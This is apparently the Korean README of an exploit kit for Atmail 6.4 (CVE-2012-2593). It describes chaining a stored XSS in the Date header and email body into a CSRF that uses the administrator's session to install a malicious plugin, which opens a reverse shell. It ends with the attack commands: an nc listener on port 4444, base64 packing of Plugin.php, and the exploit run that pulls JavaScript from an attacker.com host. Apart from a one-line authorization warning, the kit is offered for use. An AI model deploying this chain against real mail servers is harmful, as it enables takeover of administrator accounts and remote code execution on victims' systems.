
Atmail XSS-CSRF-RCE 익스플로잇 체인
atmail-rce.py: Atmail의 웹메일 인터페이스에서 CVE-2012-2593을 익스플로잇합니다.
atmail-csrf.js: CVE-2012-2593을 CSRF로 활용하여 악성 플러그인을 설치해 리버스 셸을 실행하는 자바스크립트 파일
Plugin.php: 리버스 셸을 호출하도록 설치되는 Atmail 플러그인
!!테스트 권한이 있는 서버에만 사용하세요
Atmail 이메일 서버 버전 6.4는 Date 이메일 헤더와 이메일 본문(iFrame 삽입을 통해)에 XSS 취약점이 있습니다. 이는 자바스크립트 XHR API를 사용하여 관리자 사용자의 쿠키와 함께 요청을 관리자 웹패널로 보내 CSRF로 활용되며, 리버스 셸을 위한 코드를 실행하는 악성 플러그인을 설치합니다.
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/